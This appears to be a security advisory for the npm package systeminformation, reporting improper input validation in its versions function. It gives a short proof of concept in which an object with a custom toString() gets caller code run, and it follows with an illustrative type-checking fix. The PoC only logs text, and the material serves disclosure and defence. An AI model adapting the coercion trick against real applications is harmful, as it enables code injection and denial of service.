systeminformation

vulnerability: improper input validation
severity: 6.3
language: javascript
registry: npm

✍️ Description

The systeminformation package is vulnerable to Improper Input Validation through the versions function.

🕵️‍♂️ Proof of Concept

// PoC.js

const si = require('systeminformation');
si.versions({toString : () => { console.log("This is a PoC") }});

💥 Impact

This vulnerability allows attackers to send an object instead of a string, which may lead to code injection, DoS, etc.
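
A type check that closes this class of bug, shown as an added example (not code from the systeminformation project or from this report). naiveParse is a hypothetical stand-in that only models implicit string coercion, and strictParse, MAX_LEN and the ALLOWED character set are assumptions chosen for illustration.

```javascript
'use strict';

// Hypothetical stand-in for a function that coerces its argument to text.
// This is NOT systeminformation's code; it only models implicit coercion.
function naiveParse(apps) {
  return String(apps).split(',').map((s) => s.trim().toLowerCase());
}

const MAX_LEN = 256;                      // assumed upper bound
const ALLOWED = /^[a-z0-9 ,._*-]*$/i;     // assumed allow-list for app names

// Hardened variant: check the type before anything can trigger coercion.
function strictParse(apps) {
  if (typeof apps !== 'string') {
    // Rejects objects, arrays and String wrappers without calling toString().
    throw new TypeError('apps must be a primitive string');
  }
  if (apps.length > MAX_LEN || !ALLOWED.test(apps)) {
    throw new RangeError('apps is too long or has disallowed characters');
  }
  return apps.split(',').map((s) => s.trim().toLowerCase()).filter(Boolean);
}

// Runs one input through both parsers and records whether the caller-supplied
// toString() was executed (constructed sample input, same shape as the PoC).
function demo() {
  let calls = 0;
  const crafted = { toString: () => { calls += 1; return 'npm'; } };

  const naiveResult = naiveParse(crafted);
  const callsAfterNaive = calls;

  let rejected = null;
  try {
    strictParse(crafted);
  } catch (err) {
    rejected = err.name;
  }
  return { naiveResult, callsAfterNaive, callsAfterStrict: calls, rejected };
}

console.log(demo());
console.log(strictParse('npm, node'));
```

The typeof test must come before any string method, template literal or concatenation touches the value, since each of those invokes the caller's toString().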
